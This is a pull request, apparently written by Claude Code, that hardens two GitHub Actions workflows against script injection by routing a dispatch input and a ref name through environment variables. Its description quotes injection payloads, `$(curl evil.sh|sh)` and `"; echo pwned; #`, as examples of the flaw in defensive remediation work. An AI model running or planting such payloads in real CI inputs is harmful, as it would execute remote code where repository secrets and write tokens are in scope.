### PR TITLE
fix(ci): move workflow_dispatch input and ref name out of shell interpolation

### DIFF
--- a/.github/workflows/generate-baseline.yml
+++ b/.github/workflows/generate-baseline.yml
@@ -345,6 +345,7 @@ jobs:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
           CUTOFF: ${{ steps.ledger.outputs.live_cutoff }}
           LIVE_NAME: ${{ steps.ledger.outputs.live_name }}
+          REASON: ${{ github.event.inputs.reason }}
         shell: bash
         run: |
           set -Eeuo pipefail
@@ -361,7 +362,7 @@ jobs:
             -m "sql(baseline): production schema cutoff ${CUTOFF}" \
             -m "Generated from production after ${LIVE_NAME}. Clean PostgreSQL rebuild passed." \
             -m "Includes system reference data snapshot: ${reference_name}." \
-            -m "Reason: ${{ github.event.inputs.reason }}"
+            -m "Reason: $REASON"
           git push --set-upstream origin "$BRANCH"
 
           PR_BODY="## Generated baseline

--- a/.github/workflows/regenerate-uom-types.yml
+++ b/.github/workflows/regenerate-uom-types.yml
@@ -221,6 +221,8 @@ jobs:
 
       - name: Commit regenerated types
         if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name == github.repository
+        env:
+          PUSH_REF: ${{ github.head_ref || github.ref_name }}
         run: |
           set -Eeuo pipefail
           if git diff --quiet -- src/types/database.generated.ts; then
@@ -232,4 +234,4 @@ jobs:
           git config user.email '41898282+github-actions[bot]@users.noreply.github.com'
           git add src/types/database.generated.ts
           git commit -m 'chore(db): regenerate UoM database types'
-          git push origin HEAD:${{ github.head_ref || github.ref_name }}
+          git push origin "HEAD:$PUSH_REF"


### PR DESCRIPTION
## Summary

Fourth and last PR from the security remediation pass (after #98 DB migration, #99 secret removal, #100 remaining hardening). Fixes the two GitHub Actions script-injection findings:

- **`generate-baseline.yml:364`**: `-m "Reason: ${{ github.event.inputs.reason }}"` was interpolated directly into a `run:` shell block, in a job that has `contents: write`, `pull-requests: write`, and `SUPABASE_DB_URL`/`GH_TOKEN` in scope. A `workflow_dispatch` `reason` input containing shell metacharacters (e.g. `` $(curl evil.sh|sh) ``) would execute in that context. Fixed by routing it through the step's existing `env:` block and referencing it as `"$REASON"` instead — the standard GitHub Actions hardening pattern for untrusted input.
- **`regenerate-uom-types.yml:235`**: `git push origin HEAD:${{ github.head_ref || github.ref_name }}` had the same pattern. Lower severity in practice — this workflow triggers on plain `pull_request` (not `pull_request_target`), so fork PRs never get base-repo secrets, and the step is already gated to same-repo PRs — but fixed the same way for consistency and defense in depth.

Neither of these had a known exploit in this repo (no attacker-controlled branch name or reason string on record), but both are exactly the class of finding GitHub's own Actions hardening docs call out, and the fix is small and mechanical.

## Test plan

- [x] Both workflow files parse as valid YAML (`yaml.safe_load`)
- [ ] Manual: trigger `generate-baseline.yml` via `workflow_dispatch` with a `reason` containing shell metacharacters (e.g. `"; echo pwned; #`) in a safe test run and confirm it's treated as a literal string in the commit message, not executed

---
_Generated by [Claude Code](https://claude.ai/code/session_018cutU8CHzP246sWciqbGNT)_